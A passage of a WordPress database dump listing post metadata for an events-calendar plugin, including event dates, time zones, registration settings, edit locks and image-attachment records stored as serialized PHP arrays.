s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(120295,263018,'_RTECregistrationsDisabled','1'),(120294,263018,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(120270,263018,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609083122;s:12:\"_EventOrigin\";i:1609083122;s:13:\"_thumbnail_id\";i:1609515800;s:24:\"boldgrid_hide_page_title\";i:1609083122;s:17:\"_EventShowMapLink\";i:1609083122;s:13:\"_EventShowMap\";i:1609083122;s:15:\"_EventStartDate\";i:1609084049;s:13:\"_EventEndDate\";i:1609084049;s:18:\"_EventStartDateUTC\";i:1609084049;s:16:\"_EventEndDateUTC\";i:1609084049;s:14:\"_EventDuration\";i:1609083122;s:20:\"_EventCurrencySymbol\";i:1609083122;s:22:\"_EventCurrencyPosition\";i:1609083122;s:10:\"_EventCost\";i:1609083122;s:9:\"_EventURL\";i:1609083122;s:14:\"_EventTimezone\";i:1609083122;s:18:\"_EventTimezoneAbbr\";i:1609083122;s:27:\"_EventNextPendingRecurrence\";i:1609083122;s:26:\"_RTECregistrationsDisabled\";i:1609083122;s:17:\"_RTECdeadlineType\";i:1609083122;s:19:\"_RTECwhoCanRegister\";i:1609083122;s:23:\"_RTEClimitRegistrations\";i:1609083122;s:21:\"_RTECmaxRegistrations\";i:1609083122;s:16:\"_EventRecurrence\";i:1609083122;s:18:\"_RTECnumRegistered\";i:1609083122;s:13:\"_EventVenueID\";i:1609083122;s:12:\"_dp_original\";i:1609083122;s:16:\"tribe_events_cat\";i:1609541000;s:10:\"_edit_last\";i:1609083194;s:10:\"post_title\";i:1609515596;s:12:\"post_content\";i:1609515596;s:11:\"post_status\";i:1609084049;}'),(120284,263018,'_EventEndDate','2021-01-06 20:00:00'),(120288,263018,'_EventCurrencySymbol',''),(120269,263018,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609083122;s:12:\"_EventOrigin\";i:1609083122;s:13:\"_thumbnail_id\";i:1609515800;s:24:\"boldgrid_hide_page_title\";i:1609083122;s:17:\"_EventShowMapLink\";i:1609083122;s:13:\"_EventShowMap\";i:1609083122;s:15:\"_EventStartDate\";i:1609084049;s:13:\"_EventEndDate\";i:1609084049;s:18:\"_EventStartDateUTC\";i:1609084049;s:16:\"_EventEndDateUTC\";i:1609084049;s:14:\"_EventDuration\";i:1609083122;s:20:\"_EventCurrencySymbol\";i:1609083122;s:22:\"_EventCurrencyPosition\";i:1609083122;s:10:\"_EventCost\";i:1609083122;s:9:\"_EventURL\";i:1609083122;s:14:\"_EventTimezone\";i:1609083122;s:18:\"_EventTimezoneAbbr\";i:1609083122;s:27:\"_EventNextPendingRecurrence\";i:1609083122;s:26:\"_RTECregistrationsDisabled\";i:1609083122;s:17:\"_RTECdeadlineType\";i:1609083122;s:19:\"_RTECwhoCanRegister\";i:1609083122;s:23:\"_RTEClimitRegistrations\";i:1609083122;s:21:\"_RTECmaxRegistrations\";i:1609083122;s:16:\"_EventRecurrence\";i:1609083122;s:18:\"_RTECnumRegistered\";i:1609083122;s:13:\"_EventVenueID\";i:1609083122;s:12:\"_dp_original\";i:1609083122;s:16:\"tribe_events_cat\";i:1609541000;s:10:\"_edit_last\";i:1609083194;s:10:\"post_title\";i:1609515596;s:12:\"post_content\";i:1609515596;s:11:\"post_status\";i:1609084049;}'),(120283,263018,'_EventStartDate','2021-01-06 19:00:00'),(120289,263018,'_EventCurrencyPosition','prefix'),(120290,263018,'_EventCost',''),(120291,263018,'_EventURL',''),(53964,131315,'protect_children',''),(54093,242058,'protect_children',''),(54094,242058,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1577652772;s:12:\"_EventOrigin\";i:1577652772;s:13:\"_thumbnail_id\";i:1607076206;s:24:\"boldgrid_hide_page_title\";i:1577652772;s:16:\"_EventRecurrence\";i:1607076206;s:17:\"_EventShowMapLink\";i:1577652772;s:13:\"_EventShowMap\";i:1577652772;s:13:\"_EventVenueID\";i:1577652772;s:15:\"_EventStartDate\";i:1577653190;s:13:\"_EventEndDate\";i:1577653190;s:18:\"_EventStartDateUTC\";i:1577653190;s:16:\"_EventEndDateUTC\";i:1577653190;s:14:\"_EventDuration\";i:1577653190;s:20:\"_EventCurrencySymbol\";i:1577652772;s:22:\"_EventCurrencyPosition\";i:1577652772;s:10:\"_EventCost\";i:1577652772;s:9:\"_EventURL\";i:1577652772;s:14:\"_EventTimezone\";i:1577652772;s:18:\"_EventTimezoneAbbr\";i:1577653191;s:16:\"tribe_events_cat\";i:1577677972;s:12:\"_dp_original\";i:1577652772;s:10:\"_edit_last\";i:1577652852;s:10:\"post_title\";i:1577652852;s:12:\"post_content\";i:1577653229;s:11:\"post_status\";i:1577653190;s:26:\"_RTECregistrationsDisabled\";i:1607076206;s:17:\"_RTECdeadlineType\";i:1607076206;s:19:\"_RTECwhoCanRegister\";i:1607076206;s:23:\"_RTEClimitRegistrations\";i:1607076206;s:21:\"_RTECmaxRegistrations\";i:1607076206;s:22:\"_EventHideFromUpcoming\";i:1607076206;}'),(54095,242058,'_EventOrigin','events-calendar'),(54096,242058,'_EventOrigin','events-calendar'),(54097,242058,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1577652772;s:12:\"_EventOrigin\";i:1577652772;s:13:\"_thumbnail_id\";i:1607076206;s:24:\"boldgrid_hide_page_title\";i:1577652772;s:16:\"_EventRecurrence\";i:1607076206;s:17:\"_EventShowMapLink\";i:1577652772;s:13:\"_EventShowMap\";i:1577652772;s:13:\"_EventVenueID\";i:1577652772;s:15:\"_EventStartDate\";i:1577653190;s:13:\"_EventEndDate\";i:1577653190;s:18:\"_EventStartDateUTC\";i:1577653190;s:16:\"_EventEndDateUTC\";i:1577653190;s:14:\"_EventDuration\";i:1577653190;s:20:\"_EventCurrencySymbol\";i:1577652772;s:22:\"_EventCurrencyPosition\";i:1577652772;s:10:\"_EventCost\";i:1577652772;s:9:\"_EventURL\";i:1577652772;s:14:\"_EventTimezone\";i:1577652772;s:18:\"_EventTimezoneAbbr\";i:1577653191;s:16:\"tribe_events_cat\";i:1577677972;s:12:\"_dp_original\";i:1577652772;s:10:\"_edit_last\";i:1577652852;s:10:\"post_title\";i:1577652852;s:12:\"post_content\";i:1577653229;s:11:\"post_status\";i:1577653190;s:26:\"_RTECregistrationsDisabled\";i:1607076206;s:17:\"_RTECdeadlineType\";i:1607076206;s:19:\"_RTECwhoCanRegister\";i:1607076206;s:23:\"_RTEClimitRegistrations\";i:1607076206;s:21:\"_RTECmaxRegistrations\";i:1607076206;s:22:\"_EventHideFromUpcoming\";i:1607076206;}'),(54099,242058,'boldgrid_hide_page_title','0'),(54100,242058,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(104339,242058,'_EventHideFromUpcoming','yes'),(54101,242058,'_EventShowMapLink','1'),(54102,242058,'_EventShowMap','1'),(54103,242058,'_EventVenueID','52069'),(54104,242058,'_EventStartDate','2020-01-05 14:00:00'),(54105,242058,'_EventEndDate','2020-01-05 15:30:00'),(54106,242058,'_EventStartDateUTC','2020-01-05 21:00:00'),(54107,242058,'_EventEndDateUTC','2020-01-05 22:30:00'),(54108,242058,'_EventDuration','5400'),(54109,242058,'_EventCurrencySymbol',''),(54110,242058,'_EventCurrencyPosition','prefix'),(54111,242058,'_EventCost',''),(54112,242058,'_EventURL',''),(54113,242058,'_EventTimezone','America/Denver'),(54114,242058,'_EventTimezoneAbbr','MST'),(54115,242058,'_dp_original','131409'),(54116,242058,'_edit_lock','1607101303:2'),(54163,242058,'_edit_last','2'),(120293,263018,'_EventTimezoneAbbr','MST'),(120268,263018,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609083122;s:12:\"_EventOrigin\";i:1609083122;s:13:\"_thumbnail_id\";i:1609515800;s:24:\"boldgrid_hide_page_title\";i:1609083122;s:17:\"_EventShowMapLink\";i:1609083122;s:13:\"_EventShowMap\";i:1609083122;s:15:\"_EventStartDate\";i:1609084049;s:13:\"_EventEndDate\";i:1609084049;s:18:\"_EventStartDateUTC\";i:1609084049;s:16:\"_EventEndDateUTC\";i:1609084049;s:14:\"_EventDuration\";i:1609083122;s:20:\"_EventCurrencySymbol\";i:1609083122;s:22:\"_EventCurrencyPosition\";i:1609083122;s:10:\"_EventCost\";i:1609083122;s:9:\"_EventURL\";i:1609083122;s:14:\"_EventTimezone\";i:1609083122;s:18:\"_EventTimezoneAbbr\";i:1609083122;s:27:\"_EventNextPendingRecurrence\";i:1609083122;s:26:\"_RTECregistrationsDisabled\";i:1609083122;s:17:\"_RTECdeadlineType\";i:1609083122;s:19:\"_RTECwhoCanRegister\";i:1609083122;s:23:\"_RTEClimitRegistrations\";i:1609083122;s:21:\"_RTECmaxRegistrations\";i:1609083122;s:16:\"_EventRecurrence\";i:1609083122;s:18:\"_RTECnumRegistered\";i:1609083122;s:13:\"_EventVenueID\";i:1609083122;s:12:\"_dp_original\";i:1609083122;s:16:\"tribe_events_cat\";i:1609541000;s:10:\"_edit_last\";i:1609083194;s:10:\"post_title\";i:1609515596;s:12:\"post_content\";i:1609515596;s:11:\"post_status\";i:1609084049;}'),(120282,263018,'_EventShowMap',''),(120272,263018,'_EventOrigin','events-calendar'),(120273,263018,'_EventOrigin','events-calendar'),(120274,263018,'_EventOrigin','events-calendar'),(120275,263018,'_EventOrigin','events-calendar'),(120276,263018,'_EventOrigin','events-calendar'),(120277,263018,'_EventOrigin','events-calendar'),(120278,263018,'_EventOrigin','events-calendar'),(120267,263018,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609083122;s:12:\"_EventOrigin\";i:1609083122;s:13:\"_thumbnail_id\";i:1609515800;s:24:\"boldgrid_hide_page_title\";i:1609083122;s:17:\"_EventShowMapLink\";i:1609083122;s:13:\"_EventShowMap\";i:1609083122;s:15:\"_EventStartDate\";i:1609084049;s:13:\"_EventEndDate\";i:1609084049;s:18:\"_EventStartDateUTC\";i:1609084049;s:16:\"_EventEndDateUTC\";i:1609084049;s:14:\"_EventDuration\";i:1609083122;s:20:\"_EventCurrencySymbol\";i:1609083122;s:22:\"_EventCurrencyPosition\";i:1609083122;s:10:\"_EventCost\";i:1609083122;s:9:\"_EventURL\";i:1609083122;s:14:\"_EventTimezone\";i:1609083122;s:18:\"_EventTimezoneAbbr\";i:1609083122;s:27:\"_EventNextPendingRecurrence\";i:1609083122;s:26:\"_RTECregistrationsDisabled\";i:1609083122;s:17:\"_RTECdeadlineType\";i:1609083122;s:19:\"_RTECwhoCanRegister\";i:1609083122;s:23:\"_RTEClimitRegistrations\";i:1609083122;s:21:\"_RTECmaxRegistrations\";i:1609083122;s:16:\"_EventRecurrence\";i:1609083122;s:18:\"_RTECnumRegistered\";i:1609083122;s:13:\"_EventVenueID\";i:1609083122;s:12:\"_dp_original\";i:1609083122;s:16:\"tribe_events_cat\";i:1609541000;s:10:\"_edit_last\";i:1609083194;s:10:\"post_title\";i:1609515596;s:12:\"post_content\";i:1609515596;s:11:\"post_status\";i:1609084049;}'),(120281,263018,'_EventShowMapLink',''),(120292,263018,'_EventTimezone','America/Denver'),(119990,263006,'_edit_lock','1609185766:2'),(119957,263006,'_EventOrigin','events-calendar'),(120297,263018,'_RTECwhoCanRegister','any'),(120266,263018,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609083122;s:12:\"_EventOrigin\";i:1609083122;s:13:\"_thumbnail_id\";i:1609515800;s:24:\"boldgrid_hide_page_title\";i:1609083122;s:17:\"_EventShowMapLink\";i:1609083122;s:13:\"_EventShowMap\";i:1609083122;s:15:\"_EventStartDate\";i:1609084049;s:13:\"_EventEndDate\";i:1609084049;s:18:\"_EventStartDateUTC\";i:1609084049;s:16:\"_EventEndDateUTC\";i:1609084049;s:14:\"_EventDuration\";i:1609083122;s:20:\"_EventCurrencySymbol\";i:1609083122;s:22:\"_EventCurrencyPosition\";i:1609083122;s:10:\"_EventCost\";i:1609083122;s:9:\"_EventURL\";i:1609083122;s:14:\"_EventTimezone\";i:1609083122;s:18:\"_EventTimezoneAbbr\";i:1609083122;s:27:\"_EventNextPendingRecurrence\";i:1609083122;s:26:\"_RTECregistrationsDisabled\";i:1609083122;s:17:\"_RTECdeadlineType\";i:1609083122;s:19:\"_RTECwhoCanRegister\";i:1609083122;s:23:\"_RTEClimitRegistrations\";i:1609083122;s:21:\"_RTECmaxRegistrations\";i:1609083122;s:16:\"_EventRecurrence\";i:1609083122;s:18:\"_RTECnumRegistered\";i:1609083122;s:13:\"_EventVenueID\";i:1609083122;s:12:\"_dp_original\";i:1609083122;s:16:\"tribe_events_cat\";i:1609541000;s:10:\"_edit_last\";i:1609083194;s:10:\"post_title\";i:1609515596;s:12:\"post_content\";i:1609515596;s:11:\"post_status\";i:1609084049;}'),(120280,263018,'boldgrid_hide_page_title','0'),(104320,242058,'_RTECregistrationsDisabled','1'),(119721,262989,'_EventOrigin','events-calendar'),(119719,262989,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1608755008;s:12:\"_EventOrigin\";i:1608755008;s:13:\"_thumbnail_id\";i:1608755836;s:24:\"boldgrid_hide_page_title\";i:1608755008;s:17:\"_EventShowMapLink\";i:1608755008;s:13:\"_EventShowMap\";i:1608755008;s:15:\"_EventStartDate\";i:1608755836;s:13:\"_EventEndDate\";i:1608755836;s:18:\"_EventStartDateUTC\";i:1608755836;s:16:\"_EventEndDateUTC\";i:1608755836;s:14:\"_EventDuration\";i:1608755836;s:20:\"_EventCurrencySymbol\";i:1608755008;s:22:\"_EventCurrencyPosition\";i:1608755008;s:10:\"_EventCost\";i:1608755008;s:9:\"_EventURL\";i:1608755008;s:14:\"_EventTimezone\";i:1608755008;s:18:\"_EventTimezoneAbbr\";i:1608755008;s:27:\"_EventNextPendingRecurrence\";i:1608755008;s:26:\"_RTECregistrationsDisabled\";i:1608756215;s:17:\"_RTECdeadlineType\";i:1608755008;s:19:\"_RTECwhoCanRegister\";i:1608755008;s:23:\"_RTEClimitRegistrations\";i:1608755008;s:21:\"_RTECmaxRegistrations\";i:1608755008;s:16:\"_EventRecurrence\";i:1608755008;s:18:\"_RTECnumRegistered\";i:1608755008;s:12:\"_dp_original\";i:1608755008;s:13:\"_EventVenueID\";i:1608755008;s:16:\"tribe_events_cat\";i:1609185778;s:10:\"_edit_last\";i:1608755167;s:12:\"post_content\";i:1608756633;s:11:\"post_status\";i:1608755836;s:10:\"post_title\";i:1608755955;}'),(119722,262989,'_EventOrigin','events-calendar'),(119723,262989,'_EventOrigin','events-calendar'),(119724,262989,'_EventOrigin','events-calendar'),(119725,262989,'_EventOrigin','events-calendar'),(119726,262989,'_thumbnail_id','262990'),(120890,263177,'_EventCurrencySymbol',''),(120882,263177,'boldgrid_hide_page_title','0'),(120865,263177,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609513573;s:12:\"_EventOrigin\";i:1609513573;s:13:\"_thumbnail_id\";i:1609513848;s:24:\"boldgrid_hide_page_title\";i:1609513573;s:17:\"_EventShowMapLink\";i:1609513573;s:13:\"_EventShowMap\";i:1609513573;s:15:\"_EventStartDate\";i:1609513848;s:13:\"_EventEndDate\";i:1609513848;s:18:\"_EventStartDateUTC\";i:1609513848;s:16:\"_EventEndDateUTC\";i:1609513848;s:14:\"_EventDuration\";i:1609513573;s:20:\"_EventCurrencySymbol\";i:1609513573;s:22:\"_EventCurrencyPosition\";i:1609513573;s:10:\"_EventCost\";i:1609513573;s:9:\"_EventURL\";i:1609513573;s:14:\"_EventTimezone\";i:1609513573;s:18:\"_EventTimezoneAbbr\";i:1609513573;s:27:\"_EventNextPendingRecurrence\";i:1609513573;s:26:\"_RTECregistrationsDisabled\";i:1609513573;s:17:\"_RTECdeadlineType\";i:1609513573;s:19:\"_RTECwhoCanRegister\";i:1609513573;s:23:\"_RTEClimitRegistrations\";i:1609513573;s:21:\"_RTECmaxRegistrations\";i:1609513573;s:16:\"_EventRecurrence\";i:1609513573;s:18:\"_RTECnumRegistered\";i:1609513573;s:13:\"_EventVenueID\";i:1609513573;s:12:\"_dp_original\";i:1609513573;s:16:\"tribe_events_cat\";i:1609540873;s:10:\"_edit_last\";i:1609513648;s:10:\"post_title\";i:1609513648;s:12:\"post_content\";i:1609515673;s:11:\"post_status\";i:1609513848;}'),(120883,263177,'_EventShowMapLink',''),(120885,263177,'_EventStartDate','2021-01-13 19:00:00'),(119942,263006,'protect_children',''),(119943,263006,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1608756780;s:12:\"_EventOrigin\";i:1608756780;s:13:\"_thumbnail_id\";i:1608756780;s:24:\"boldgrid_hide_page_title\";i:1608756780;s:17:\"_EventShowMapLink\";i:1608756780;s:13:\"_EventShowMap\";i:1608756780;s:15:\"_EventStartDate\";i:1608756838;s:13:\"_EventEndDate\";i:1608756838;s:18:\"_EventStartDateUTC\";i:1608756838;s:16:\"_EventEndDateUTC\";i:1608756838;s:14:\"_EventDuration\";i:1608756780;s:20:\"_EventCurrencySymbol\";i:1608756780;s:22:\"_EventCurrencyPosition\";i:1608756780;s:10:\"_EventCost\";i:1608756780;s:9:\"_EventURL\";i:1608756780;s:14:\"_EventTimezone\";i:1608756780;s:18:\"_EventTimezoneAbbr\";i:1608756780;s:27:\"_EventNextPendingRecurrence\";i:1608756780;s:26:\"_RTECregistrationsDisabled\";i:1608756780;s:17:\"_RTECdeadlineType\";i:1608756780;s:19:\"_RTECwhoCanRegister\";i:1608756780;s:23:\"_RTEClimitRegistrations\";i:1608756780;s:21:\"_RTECmaxRegistrations\";i:1608756780;s:16:\"_EventRecurrence\";i:1608756780;s:18:\"_RTECnumRegistered\";i:1608756780;s:13:\"_EventVenueID\";i:1608756780;s:12:\"_dp_original\";i:1608756780;s:16:\"tribe_events_cat\";i:1609185766;s:10:\"_edit_last\";i:1608756838;s:11:\"post_status\";i:1608756838;s:12:\"post_content\";i:1608757013;}'),(119944,263006,'_EventOrigin','events-calendar'),(119945,263006,'protect_children',''),(119946,263006,'protect_children',''),(119947,263006,'protect_children',''),(119948,263006,'protect_children',''),(119949,263006,'protect_children',''),(119950,263006,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1608756780;s:12:\"_EventOrigin\";i:1608756780;s:13:\"_thumbnail_id\";i:1608756780;s:24:\"boldgrid_hide_page_title\";i:1608756780;s:17:\"_EventShowMapLink\";i:1608756780;s:13:\"_EventShowMap\";i:1608756780;s:15:\"_EventStartDate\";i:1608756838;s:13:\"_EventEndDate\";i:1608756838;s:18:\"_EventStartDateUTC\";i:1608756838;s:16:\"_EventEndDateUTC\";i:1608756838;s:14:\"_EventDuration\";i:1608756780;s:20:\"_EventCurrencySymbol\";i:1608756780;s:22:\"_EventCurrencyPosition\";i:1608756780;s:10:\"_EventCost\";i:1608756780;s:9:\"_EventURL\";i:1608756780;s:14:\"_EventTimezone\";i:1608756780;s:18:\"_EventTimezoneAbbr\";i:1608756780;s:27:\"_EventNextPendingRecurrence\";i:1608756780;s:26:\"_RTECregistrationsDisabled\";i:1608756780;s:17:\"_RTECdeadlineType\";i:1608756780;s:19:\"_RTECwhoCanRegister\";i:1608756780;s:23:\"_RTEClimitRegistrations\";i:1608756780;s:21:\"_RTECmaxRegistrations\";i:1608756780;s:16:\"_EventRecurrence\";i:1608756780;s:18:\"_RTECnumRegistered\";i:1608756780;s:13:\"_EventVenueID\";i:1608756780;s:12:\"_dp_original\";i:1608756780;s:16:\"tribe_events_cat\";i:1609185766;s:10:\"_edit_last\";i:1608756838;s:11:\"post_status\";i:1608756838;s:12:\"post_content\";i:1608757013;}'),(119968,263006,'_EventStartDate','2021-01-18 19:00:00'),(119971,263006,'_EventEndDateUTC','2021-01-19 03:00:00'),(119972,263006,'_EventDuration','3600'),(119951,263006,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1608756780;s:12:\"_EventOrigin\";i:1608756780;s:13:\"_thumbnail_id\";i:1608756780;s:24:\"boldgrid_hide_page_title\";i:1608756780;s:17:\"_EventShowMapLink\";i:1608756780;s:13:\"_EventShowMap\";i:1608756780;s:15:\"_EventStartDate\";i:1608756838;s:13:\"_EventEndDate\";i:1608756838;s:18:\"_EventStartDateUTC\";i:1608756838;s:16:\"_EventEndDateUTC\";i:1608756838;s:14:\"_EventDuration\";i:1608756780;s:20:\"_EventCurrencySymbol\";i:1608756780;s:22:\"_EventCurrencyPosition\";i:1608756780;s:10:\"_EventCost\";i:1608756780;s:9:\"_EventURL\";i:1608756780;s:14:\"_EventTimezone\";i:1608756780;s:18:\"_EventTimezoneAbbr\";i:1608756780;s:27:\"_EventNextPendingRecurrence\";i:1608756780;s:26:\"_RTECregistrationsDisabled\";i:1608756780;s:17:\"_RTECdeadlineType\";i:1608756780;s:19:\"_RTECwhoCanRegister\";i:1608756780;s:23:\"_RTEClimitRegistrations\";i:1608756780;s:21:\"_RTECmaxRegistrations\";i:1608756780;s:16:\"_EventRecurrence\";i:1608756780;s:18:\"_RTECnumRegistered\";i:1608756780;s:13:\"_EventVenueID\";i:1608756780;s:12:\"_dp_original\";i:1608756780;s:16:\"tribe_events_cat\";i:1609185766;s:10:\"_edit_last\";i:1608756838;s:11:\"post_status\";i:1608756838;s:12:\"post_content\";i:1608757013;}'),(119967,263006,'_EventShowMap',''),(119978,263006,'_EventTimezoneAbbr','MST'),(119979,263006,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(119952,263006,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1608756780;s:12:\"_EventOrigin\";i:1608756780;s:13:\"_thumbnail_id\";i:1608756780;s:24:\"boldgrid_hide_page_title\";i:1608756780;s:17:\"_EventShowMapLink\";i:1608756780;s:13:\"_EventShowMap\";i:1608756780;s:15:\"_EventStartDate\";i:1608756838;s:13:\"_EventEndDate\";i:1608756838;s:18:\"_EventStartDateUTC\";i:1608756838;s:16:\"_EventEndDateUTC\";i:1608756838;s:14:\"_EventDuration\";i:1608756780;s:20:\"_EventCurrencySymbol\";i:1608756780;s:22:\"_EventCurrencyPosition\";i:1608756780;s:10:\"_EventCost\";i:1608756780;s:9:\"_EventURL\";i:1608756780;s:14:\"_EventTimezone\";i:1608756780;s:18:\"_EventTimezoneAbbr\";i:1608756780;s:27:\"_EventNextPendingRecurrence\";i:1608756780;s:26:\"_RTECregistrationsDisabled\";i:1608756780;s:17:\"_RTECdeadlineType\";i:1608756780;s:19:\"_RTECwhoCanRegister\";i:1608756780;s:23:\"_RTEClimitRegistrations\";i:1608756780;s:21:\"_RTECmaxRegistrations\";i:1608756780;s:16:\"_EventRecurrence\";i:1608756780;s:18:\"_RTECnumRegistered\";i:1608756780;s:13:\"_EventVenueID\";i:1608756780;s:12:\"_dp_original\";i:1608756780;s:16:\"tribe_events_cat\";i:1609185766;s:10:\"_edit_last\";i:1608756838;s:11:\"post_status\";i:1608756838;s:12:\"post_content\";i:1608757013;}'),(119966,263006,'_EventShowMapLink',''),(119970,263006,'_EventStartDateUTC','2021-01-19 02:00:00'),(119953,263006,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1608756780;s:12:\"_EventOrigin\";i:1608756780;s:13:\"_thumbnail_id\";i:1608756780;s:24:\"boldgrid_hide_page_title\";i:1608756780;s:17:\"_EventShowMapLink\";i:1608756780;s:13:\"_EventShowMap\";i:1608756780;s:15:\"_EventStartDate\";i:1608756838;s:13:\"_EventEndDate\";i:1608756838;s:18:\"_EventStartDateUTC\";i:1608756838;s:16:\"_EventEndDateUTC\";i:1608756838;s:14:\"_EventDuration\";i:1608756780;s:20:\"_EventCurrencySymbol\";i:1608756780;s:22:\"_EventCurrencyPosition\";i:1608756780;s:10:\"_EventCost\";i:1608756780;s:9:\"_EventURL\";i:1608756780;s:14:\"_EventTimezone\";i:1608756780;s:18:\"_EventTimezoneAbbr\";i:1608756780;s:27:\"_EventNextPendingRecurrence\";i:1608756780;s:26:\"_RTECregistrationsDisabled\";i:1608756780;s:17:\"_RTECdeadlineType\";i:1608756780;s:19:\"_RTECwhoCanRegister\";i:1608756780;s:23:\"_RTEClimitRegistrations\";i:1608756780;s:21:\"_RTECmaxRegistrations\";i:1608756780;s:16:\"_EventRecurrence\";i:1608756780;s:18:\"_RTECnumRegistered\";i:1608756780;s:13:\"_EventVenueID\";i:1608756780;s:12:\"_dp_original\";i:1608756780;s:16:\"tribe_events_cat\";i:1609185766;s:10:\"_edit_last\";i:1608756838;s:11:\"post_status\";i:1608756838;s:12:\"post_content\";i:1608757013;}'),(119965,263006,'boldgrid_hide_page_title','0'),(119980,263006,'_RTECregistrationsDisabled','1'),(119718,262989,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1608755008;s:12:\"_EventOrigin\";i:1608755008;s:13:\"_thumbnail_id\";i:1608755836;s:24:\"boldgrid_hide_page_title\";i:1608755008;s:17:\"_EventShowMapLink\";i:1608755008;s:13:\"_EventShowMap\";i:1608755008;s:15:\"_EventStartDate\";i:1608755836;s:13:\"_EventEndDate\";i:1608755836;s:18:\"_EventStartDateUTC\";i:1608755836;s:16:\"_EventEndDateUTC\";i:1608755836;s:14:\"_EventDuration\";i:1608755836;s:20:\"_EventCurrencySymbol\";i:1608755008;s:22:\"_EventCurrencyPosition\";i:1608755008;s:10:\"_EventCost\";i:1608755008;s:9:\"_EventURL\";i:1608755008;s:14:\"_EventTimezone\";i:1608755008;s:18:\"_EventTimezoneAbbr\";i:1608755008;s:27:\"_EventNextPendingRecurrence\";i:1608755008;s:26:\"_RTECregistrationsDisabled\";i:1608756215;s:17:\"_RTECdeadlineType\";i:1608755008;s:19:\"_RTECwhoCanRegister\";i:1608755008;s:23:\"_RTEClimitRegistrations\";i:1608755008;s:21:\"_RTECmaxRegistrations\";i:1608755008;s:16:\"_EventRecurrence\";i:1608755008;s:18:\"_RTECnumRegistered\";i:1608755008;s:12:\"_dp_original\";i:1608755008;s:13:\"_EventVenueID\";i:1608755008;s:16:\"tribe_events_cat\";i:1609185778;s:10:\"_edit_last\";i:1608755167;s:12:\"post_content\";i:1608756633;s:11:\"post_status\";i:1608755836;s:10:\"post_title\";i:1608755955;}'),(119727,262989,'boldgrid_hide_page_title','0'),(120864,263177,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609513573;s:12:\"_EventOrigin\";i:1609513573;s:13:\"_thumbnail_id\";i:1609513848;s:24:\"boldgrid_hide_page_title\";i:1609513573;s:17:\"_EventShowMapLink\";i:1609513573;s:13:\"_EventShowMap\";i:1609513573;s:15:\"_EventStartDate\";i:1609513848;s:13:\"_EventEndDate\";i:1609513848;s:18:\"_EventStartDateUTC\";i:1609513848;s:16:\"_EventEndDateUTC\";i:1609513848;s:14:\"_EventDuration\";i:1609513573;s:20:\"_EventCurrencySymbol\";i:1609513573;s:22:\"_EventCurrencyPosition\";i:1609513573;s:10:\"_EventCost\";i:1609513573;s:9:\"_EventURL\";i:1609513573;s:14:\"_EventTimezone\";i:1609513573;s:18:\"_EventTimezoneAbbr\";i:1609513573;s:27:\"_EventNextPendingRecurrence\";i:1609513573;s:26:\"_RTECregistrationsDisabled\";i:1609513573;s:17:\"_RTECdeadlineType\";i:1609513573;s:19:\"_RTECwhoCanRegister\";i:1609513573;s:23:\"_RTEClimitRegistrations\";i:1609513573;s:21:\"_RTECmaxRegistrations\";i:1609513573;s:16:\"_EventRecurrence\";i:1609513573;s:18:\"_RTECnumRegistered\";i:1609513573;s:13:\"_EventVenueID\";i:1609513573;s:12:\"_dp_original\";i:1609513573;s:16:\"tribe_events_cat\";i:1609540873;s:10:\"_edit_last\";i:1609513648;s:10:\"post_title\";i:1609513648;s:12:\"post_content\";i:1609515673;s:11:\"post_status\";i:1609513848;}'),(95657,262070,'_edit_last','2'),(120873,263177,'_EventOrigin','events-calendar'),(95658,262070,'_RTECregistrationsDisabled','0'),(120874,263177,'_EventOrigin','events-calendar'),(120875,263177,'_EventOrigin','events-calendar'),(95659,262070,'_RTECdeadlineType','start'),(97383,262066,'_RTECdeadlineType','start'),(95660,262070,'_RTECwhoCanRegister','any'),(95661,262070,'_RTEClimitRegistrations','0'),(97381,262070,'_EventVenueID','262305'),(95662,262070,'_RTECmaxRegistrations','30'),(63576,248842,'_wp_attached_file','2020/01/wslope-balloons-sized-3.jpg'),(66686,251919,'_wp_attachment_image_alt','Wisdom of the Heart, Book 2'),(66315,15806,'protect_children',''),(86149,258547,'_field_135','j.garcia@trxa.net'),(81157,125419,'protect_children',''),(81229,125677,'cropPositionNeedUpdate','a:3:{i:0;b:0;i:1;s:3:\"155\";i:2;s:3:\"100\";}'),(81441,138261,'_edit_lock','1579628150:2'),(81450,152442,'_edit_lock','1579628173:2'),(81455,174942,'_edit_lock','1579628186:2'),(81464,204589,'_edit_lock','1579628312:2'),(81469,230895,'_edit_lock','1579628322:2'),(81479,243613,'_edit_lock','1579628524:2'),(81484,65663,'_edit_lock','1579628443:2'),(81493,198979,'_edit_lock','1579628628:2'),(81502,254595,'original-file','2020/01/woman-ocean-updraft-pre-smush-original.jpg'),(81503,254595,'smush-complete','1'),(81504,254595,'smush-info','The file was compressed from 18.56 KB to 18.11 KB saving 2.4 percent using 